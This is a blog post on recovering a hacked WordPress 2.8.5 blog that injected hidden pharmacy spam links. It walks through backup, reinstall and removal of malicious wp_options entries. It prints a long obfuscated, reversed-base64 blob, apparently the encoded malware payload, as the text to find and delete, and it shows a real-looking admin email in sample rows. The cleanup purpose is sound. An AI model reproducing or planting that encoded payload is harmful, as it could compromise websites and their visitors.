It’s all too common these days, but our WordPress blog was hacked again because it was an older version of WordPress version 2.8.5.
It was a nasty hack that injected hidden, pharmacy links in the footer of the page, and it was very difficult to remove. You can’t see the links because they are hidden using CSS, so unless you have a tool to swith the CSS off, you can look at a cached version of your blog in Google, using the text only option. Just upgrading the blog to the latest version of WordPress didn’t work. I’m afraid the script described here’s needs a fairly good knowledge of exporting and importing MySQL databases but there’s a pretty good tutorial on how to do that here;
Now the first thing you need to do is make a backup of of your existing blog, including downloads and the database itself.
It’s a good idea to delete your spam comments because these can make your database large and difficult to edit in a text editor.
After you’ve downloaded your files, you need to completely remove all files from your blog folder on the server (see exceptions below), including your wp-admin and wp-includes folders because the hack leaves backdoors in these (as image files actually).
For this hack, you can keep your /wp-content/wp-uploads files and your theme in your /wp-content/themes/ folder as well as any plugins in your /wp-content/plugins folder.
Then upload the latest version of WordPress editing your wp-config.php file with your server setting (but again with this hack you can use your old wp-config.php file).
Next export your database and open it in a text editor (not Word or Write).
Search for a table called wp_options (is search for that ext string and you’ll see entries such as;
(5, 0, ‘users_can_register’, ”, ‘yes’),
(6, 0, ‘admin_email’, ‘carl@tourboxantalya.com’, ‘yes’),
(7, 0, ‘start_of_week’, ’1′, ‘yes’),
(8, 0, ‘use_balanceTags’, ”, ‘yes’),
(9, 0, ‘use_smilies’, ’1′, ‘yes’),
(10, 0, ‘require_name_email’, ’1′, ‘yes’),
(11, 0, ‘comments_notify’, ’1′, ‘yes’),
(12, 0, ‘posts_per_rss’, ’10′, ‘yes’),
(13, 0, ‘rss_excerpt_length’, ’50′, ‘yes’),
(14, 0, ‘rss_use_excerpt’, ’0′, ‘yes’),
(15, 0, ‘mailserver_url’, ‘mail.example.com’, ‘yes’),
(16, 0, ‘mailserver_login’, ‘login@example.com’, ‘yes’),
(17, 0, ‘mailserver_pass’, ‘password’, ‘yes’),
(18, 0, ‘mailserver_port’, ’110′, ‘yes’),
(19, 0, ‘default_category’, ’9′, ‘yes’),
(20, 0, ‘default_comment_status’, ‘open’, ‘yes’),
(21, 0, ‘default_ping_status’, ‘open’, ‘yes’),
And so on. Scroll down until you see a chunk of gibberish with 100′s of lines with text such as;
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
Delete that text in the quotes! Delete any lines with a transientid statement. There may be other gibberish options and you need to scroll down until the start of the next table which will start with something like;
– ——————————————————–
–
– Table structure for table `wp_post2cat`
–
CREATE TABLE IF NOT EXISTS `wp_post2cat` (
When you’ve done that, import your cleaned up table and run the upgrade, and with any luck you’ll be back in business. If not let us know here via a comment and we can have a look for you. There are a lot of different hacks out there and most affect the header or footer files – this one’s unique in that it uses a back door in your wp-admin folder.
Once you’ve done this you should change your ftp, MySQL user, and WordPress passwords to be safe.
Let us know how you get on or if you need any help!